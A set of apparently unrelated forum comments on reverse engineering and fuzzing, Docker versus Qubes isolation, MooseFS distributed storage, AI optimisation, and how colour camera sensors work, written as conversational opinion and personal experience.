Um, are you sure we are there yet? For me it seems that the only atoms it has learned are the long-lasting static scenes, rather than eyes or mouths. Maybe it is just a matter of scoring and can be improved, but still...
Binaries can be converted back to assembly and quite often even back to equivalent C; bugs are most often found by fuzzing (intentional or not) which does not require source code. The difference between open and closed source is that open is more often analysed by white hats who rather publish vulnerabilities and help fixing them, while closed by black hats who rather sell or exploit them in secret.
You misunderstand; if you can't even decrypt the binary, you can't disassemble, much less run a decompiler over it.
As someone who has done quite a bit of reverse engineering work, I have no idea how I'd identify and isolate a vulnerability found by fuzzing without the ability to even look at the machine code.
If it runs, it has to be decrypted (at a current level of cryptography); at most it is obfuscated and the access is blocked by some hardware tricks which may be costly to circumvent, but there is nothing fundamental stopping you.
C is not a problem -- you can make a bug in every language. Even with memory safety and a perfect compiler, bug may direct the flow in bad direction (bypassing auth for instance) or leak information via side-channel.
This is only for certain, verbal questions like antonym of, synonym of, X is to Y as Z to what; for each of them a separate, specific model was built (not that the AI read the question and printed relevant answer).
To sum up, the paper should be titled "Dictionary is better than MechTurk users on look-in-dictionary tasks."
There are also distributed file systems (MooseFS, Gluster, Ceph) which can duplicate data across physical locations, protect it with checksums, scrub in a distributed manner and auto-heal, all of that transparently.
About hard as setting up any UNIX daemon on a few computers. Reliability is a complex topic, depends on what you need -- for an anecdotal evidence I maintain a microscopic (10-20TB/4-6 desktop hosts) Moose deployment for a distributed home dir use-case over 5 years without any data loss despite two full computer losses, one disk malfunction and numerous network and power outages (it never detected a bit-rot event though). There are many serious success and horror stories one Google query away.
We do know what goes on in them. They are just trying (more-less, but it is only a matter of speed) random solutions till good enough, where the human operator decides what is "good". Which is fundamental, because when you have a function f you know nothing about, the _only_ thing you can do optimise it is to sample randomly, keep current best solution and hope it is good enough. Anything smarter would require some knowledge or assumptions, so is impossible to apply.
In the even more meta direction, the question is though whether human intelligence is some mystical emergent magic, or just try-till-good-enough massive optimisation of physiological needs plus some bonus for social behaviour sponsored by evolution plus some random noise, hidden behind a self-illusion of being a real thing, similar to consciousness. This idea is obviously somewhat disturbing; it shows that success is only a matter of luck, resourcefulness depends on environment, motives are never really noble, apes are only less successful than us because they can't (yet?) efficiently store and share information and art is a matter of an accidental conflux of random biases. On the other hand it suggests that singularity is nonsense, even more, that AGIs will become self-crippled with similar flaws that we observe within ourselves.
Why, docker-initiated chroot would prevent FF from acessing any not-FF+libs files, including which this malware steals; on Qubes it would have access to everything user-readable in the AppVM, which may include some secrets as Qubes workflow involves user-supervised copying files across VMs.
Obviously docker, as opposed to Qubes, won't stop more complex malware that exploits the kernel.
From all I have heard, docker is not even secure enough to let user A do things in dockerthingyA and user B in dockerthingyB. From what I was told, user A could easily break out into dockerthingyB and maybe even the host. Are you sure it really is not possible short of exploiting the kernel (or docker I guess)?
I don't know the details, but this is rather due to fact how docker operates -- there is a daemon that runs with root privs (which are esential to create a container) controlled by a client with a protocol that has no concept of fine-graind access lists. Consequently, user A can do anything with user B's containers because docker doesn't even have such thing as container ownership. Also docker protocol involves something which is basically opening shell as root, thus users with docker access have also a passwordless sudo. All those choices are basically ok for docker because it is designed for single-user systems like developer laptops or application servers.
Currently, for multi-user systems the only safe option for containers is sadly virtualisation or emulation; nice implementation of rootless chroot is proot, http://proot.me/
Honestly speaking, "colour" cameras we use every day are also false colour; they shoot 3 monochrome images in red, blue and green chunks of spectrum and mix the whole thing using plethora of parameters like white balance, or gamma.
All this is heavily tuned towards human vision specifics to enable either monitor or print to induce a similar sensation in the viewer's brain that the photographed object would, despite the fact that the whole process retains only a negligible fraction of the information carried into the camera by the original photons. Quite a lot of animals perceive the hue of human-made photos and videos as totally odd, misexposed or desaturated, just because of having vision adapted to wavelengths or other properties of light which our processing mostly removes as redundant. Even more, one day humans may start to enrich their vision by technological or biological modifications, consequently beginning to perceive today photos as as dull as we see those old, monochrome ones.
To elaborate a bit, almost all digital cameras take a single monochrome exposure but each sensor element has either a red, green, or blue filter over it, in a mosaic pattern. From the relative brightnesses of neighboring pixels color data can be reconstructed and interpolated to form a human-viewable image.
The Foveon sensors are a sort-of exception to this rule, but they haven't really demonstrated enough visible benefits for them to become widely adopted.